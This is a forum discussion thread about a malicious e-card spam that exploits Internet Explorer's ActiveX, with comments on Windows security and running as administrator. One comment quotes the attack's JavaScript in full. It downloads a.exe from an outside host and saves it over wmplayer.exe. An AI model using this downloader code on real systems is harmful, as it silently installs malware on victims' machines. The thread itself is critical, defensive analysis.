Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

Re:e-cards

[jwthompson2]

Interesting take. I know my wife likes ecards because it is of course free which beats a card and stamp. She doesn't use them very often, except when she comes across a particularly funny or expressive one, and only when we forget to get a real card... :-)

---
Mod me down...I'm already -1....woot!

Spam in Outlook

[DoorFrame]

I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user openning an attachment or clicking on an off-email link? Any examples?

The most frightening bit here

[Rope_a_Dope]

ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an Activex control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

Re:The most frightening bit here

[CdBee]

"Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

(MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.

Re:The most frightening bit here

[lordDallan]

The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

Re:The most frightening bit here

[kisrael]

"No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

No it wouldn't be redundant, different behaviors are impled, since it's not "No to ALL files I selected to copy", it's "no to all files with a name collision"

I'm thinking of copying a bunch of files (say, W, X, Y, and Z) into a directory that already has some files with the same name. (say, X and Z)

W copies fine.
X brings up that dialog:
"Yes"--copy X, copy Y, ask about Z
"Yes to all"--copy X, copy Y, copy Z
"No"--skip X, copy Y, ask about Z
"No to all"--skip X, copy Y, skip Z
"Cancel"--skip X, skip Y, skip Z

Now, this is obviously a trivial example, but if you have a large number of files, where you want all the files that were in the source directory but don't want any existing file in the destination directory changed, the assymetry in the dialog is annoying.

Re:The most frightening bit here

[misleb]

Windows Update depends on ActiveX to determine which updates a user already has.Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.

Maybe it is time the world gave up on these mega-web-applications. Why can't Microsoft write a damn standalone Windows UPdate application that doesn't use a browser.... like Apple does on OS X? Why does everything need to be web based these days? Sandbox the damn ActiveX crap, restrict user privilges by default, tighten Explorer security settings BY DEFAULT, and ship a standalone app for everything that you can. If Microsoft wants to improve security, they are ultimately going to have to stand up to users and say, "You know what? We will only trade so much security for convenience. Deal with it."

-matthew

Re:e-cards

[toasted_calamari]

What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

With regards to the article, thats definitly one of the nastiest browser exploits i've seen in a long time, makes me glad I don't use windows and IE.

Re:You might remember me

[ggvaidya]

... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

A little bit unfair to Outlook

[DoorFrame]

This story is presented as an example of the bad things that can happen from opening spam in Outlook ("If you're still using Outlook and Internet Explorer, this is a good time to find alternatives"). But the story doesn't point to any actual isssue with Outlook, only exploits in Explorer that allow downloaded code to be executed remotely. The Outlook bashing seems out of place.

Re:It'd be scary if I ran my PC as Administrator..

[ggvaidya]

That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

I saw a similar type email

[krray]

I saw a similar type email -- and after reading the article downloaded the a.exe file for review:
$ file a.exe
a.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Yep, appears to be a executable type file.

Hey Microsoft -- this would a HINT for inbound type files:
$ chmod 700 a.exe

Ready to execute -- what the heck. This is a sandboxed VMWAre type machine:
$ ./a.exe
sh: ./a.exe: cannot execute binary file

Dag nabbit, what am I doing wrong? :)

Redndant, I know. Don't run as Administrator.

[gfecyk]

I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.

The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

Re:Redndant, I know. Don't run as Administrator.

[upside]

It's atrocious how Windows apps STILL don't get written for multiuser and low-privilege user environments.

Take for example Adobe's Photshop 7 and Pagemaker 7. These came out way after Win2K. You have to make their respective folders and registry entries world writable before they start working for normal users.

I'm not sure about the latest CS versions, but I have my doubts.

Re:Redndant, I know. Don't run as Administrator.

[seanvaandering]

Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

Sometimes its needed to be said, and I'll agree, as a linux newbie in my own right, I knew enough to know that running as root on my machine was the stupidest thing I could do. Also in Mandrake 9.2 - if you DO try to log in as root, your desktop is completely RED - a very annoying, but effective color.

I think the biggest problem is that people think that because they OWN their computer that they should immediately have full access to EVERYTHING, including the fact that i have the right to run as administrator. Now I'm not debating that you can't run as admin, I'm stating that if someone made you a pilot today and gave ya a nice DC-10 on the runway, just because someone gave you something you have no clue how to use, would you just go and run with it? The unfortunate part is that computers look and act so "easy-to-use" - that while happy user is happily clicking away on "remove spam from your e-mail - click here" windows, that the damage is already being done - and they don't even know it. Now heres the catch: when you TELL them that you should run as a regular user, they look at you like you came from another planet and say "yeah right - its my computer and I'll damn well do what i please with it!" - which is great until they start calling you up for tech support because "It runs slow", or "It doesn't work" or [fill in your worst nightmare here].

Cheers.

Re:Are there really better alternatives???

[aborchers]

The "alternative" clients typically do not do things like run scripts, overwrite files, etc without at least a confirmation from the user. The problem is that IE and Outlook are so feature rich, and so easily configured (historically by default) to gullibly trust any command that comes down the pipe, that they pose a severe risk to exactly the class of users (i.e. inexperienced or ignorant) that most frequently use them.

So, in effect, yes, there is an aspect to the other clients that is inherently more secure, but users savvy enough to obtain and use them could probably also configure and use most modern MS products fairly securely as well. It is a combination of user behavior and software design security.

For the record, I find it hard to believe that someone with a 5-digit /. ID could ask this question and not be trolling... ;-)

German dialer spam gangs used "e-cards", too.

[DocSnyder]

About a year ago, German email users have been spammed with similar e-cards, which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year to stop this kind of fraud.

Using Mozilla on Windows won't protect you ...

wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

My solution: I renamed wscript.exe and cscript.exe so they can't execute.

I got one yesterday

[swb]

Was the e-card itself (as viewed at the web site 123greetings.com) a problem, or was it the message itself the problem?

I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.

In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.

"Sparky" does this on clients' Enterprises.

[gfecyk]

> Tell you what sparky -- YOU try that across
> a enterprise type installation.

Done. Twice.

I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.

I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.

Re:Turn off HTML viewing in your email client!

[Erik+Piper]

There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just words. I do tech support, and I'm THRILLED when the person on "the other end of the line" sends me an HTML e-mail, because it means I can use the features of HTML mail to provide him or her a clearer, more visible explanation, and if that person has a decent Internet connection, I can even ask them to paste screenshots into their e-mails instead of trying to guess which client they have and how pasting attachments in it works, and then explaining it to them and hoping they understand.

Erik

Virus vs. Spam

[the+grace+of+R'hllor]

Because Viruses can do better with some effort.

MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

E-mail just can't beat those times.

Re:Ugly is what ugly does

[JCMay]

What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

the sky is falling!

[Carty]

"which is a rather clear analysis of a piece of malicious spam"

I appreciate his effort but I don't see what's particularly clear about:

'I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free.'

One thing that *is* clear is that Windows machines that have installed the most recent patches from MS are not vulnerable. It is really necessary to abandon IE?

I am no MS apologist but I did not learn anything meaningful from this ...

Re:Are there really better alternatives???

[orthogonal]

The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

Go to web-site, get a new OS!

And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?

To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.

I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

What the hell?

OR

[diablobynight]

You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account? And if your talking a webmaster or sales account, then yes, turn off html, or have your IT guy set up your securities properly.

Re:OR

[diablobynight]

did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse all unknown white list. And if I saw, the subject said, In response to Slashdot, or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTMl on, if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

Re:Don't run ActiveX as Administrator, simple.

[the_L0rax]

They're right, even if you know better than to have your regular account be an admin account MS pretty much forces you to operate that way. I have tried setting up seperate accounts and it just isn't practical. Way too many things require you to have admin priviledges, so you can either switch users every 3rd program or you just give up and use an admin account. Even right clicking and choosing "Rus As" rarely works right. Microsoft made a half-a**ed attempt at multi-user support just so they could say they had it.

Monitoring...reputable...contradiction

[Pac]

The phrase "a reputable Russian monitoring site" only makes sense if you think monitoring is a reputable business. I don't consider doubleclick reputable. I don't think anything in, near or around the advertsing industry can be reputable. But that's just me, move on, nothing to see here.

Spy.htm: honey pot potential

[Ktistec+Machine]

Here's a honeypot idea: use the "spy.htm" code to add a machine to the attacker's "spy" log, then wait....

Re:Turn off HTML viewing in your email client!

[misleb]

I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

This isn't a realistic option for most people. Nor is it very convenient. Unless, of course, the image is part of an existing website.

Why shuttle around bloated email attachments?

It is not a big deal in most cases. Although this brings up an interesting point. There are cases when people want to send files (maybe an MP3 or movie) in excess of 5 megabytes. This is not appropriate for the current state of email (SMTP, et al). What do regular users do when then want to send someone a large file? They're not going to choke MY SMTP servers (with virus scanning) with their huge attachments.

-matthew

Re:Security through obscurity DOES work

[Sgt+York]

Well, security through obscurity works, but only when the obscurity is at or very near 100%. In the Pentagon, no one is allowed to see the layout, and only certain people are allowed to interact with any part of it. The McVeigh execution was the same way, no one got to see any details of it. IIRC, the exact time/date wasn't even announced until the last minute.

However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.

The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.

I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, alomst to the point of nonexsistence in the software world.

Re:Turn off HTML viewing in your email client!

[Endive4Ever]

When they first put in Windows for Workgroups at the company I worked for at the time, they put one of the more annoying putzes in Engineering in charge of 'the mail server' which was a wobbly install of NT Advanced Server 3.1'.

I proceeded to mail my entire c:\dos directory as attachments to one of my buddies. It just seemed like the thing to do. Boy, that took down the mail server bad.

It really got the tech mad, but he was a third stringer doing make-work for the 'vanguard' engineer who thought it was such a good idea to roll out Windows For Workgroups (in direct conflict with the IT people who had other plans of afflicting us with Novell stuff,) and I was writing the embedded code that made the company's products run. It was overall a fun time.

Are Unix systems secure?

[cpghost]

As Unix(*) users, we feel pretty confident when confronted with this kind of a.exe crap. But seriously, what would have happened, if the file was a Linux executable? A shell or perl script? Are we still secure? Maybe, maybe not:

• It depends what browser we're using. Browsers on Unix normally don't execute remote code, but the more browsers we use, the less we can be sure.
• Are our rendering engines (Gecko and Konqueror) really immune to buffer overruns of malicious web sites? We don't know for sure. Most of us are aware of Konqueror dumping core, but no harm is done, because a Windows virus couldn't start. What if the remote site contained valid Linux instructions instead?
• A whole class of vulnerabilities consists of so called cross site scripting vulns (see bugtraq).
• Even if an executable runs with the permissions of a regular, non-root user, are we still secure? I've seen setups where the user was member of group 0 (wheel), which opened up a whole lot of potential vulnerabilities.

The biggest asset of the Unix community is still the high level computer literacy amongst its users. We're smarter than regular Windows users on the average, and we know better than to blindly click on links when we're being told to. But with growing Linux popularity, we're bound to "inherit" more unsavvy and clueless computer users, which would be just as malleable as Windows users.

The last line of defense(tm) consists of just two principles:

• We don't run our browsers in kernel mode.
• We don't use the root account for regular activites (right?).

Will that be enough, once spammers start targetting Linux? Let's hope for the best.

(*) Unix in the generic sense, not Darl's.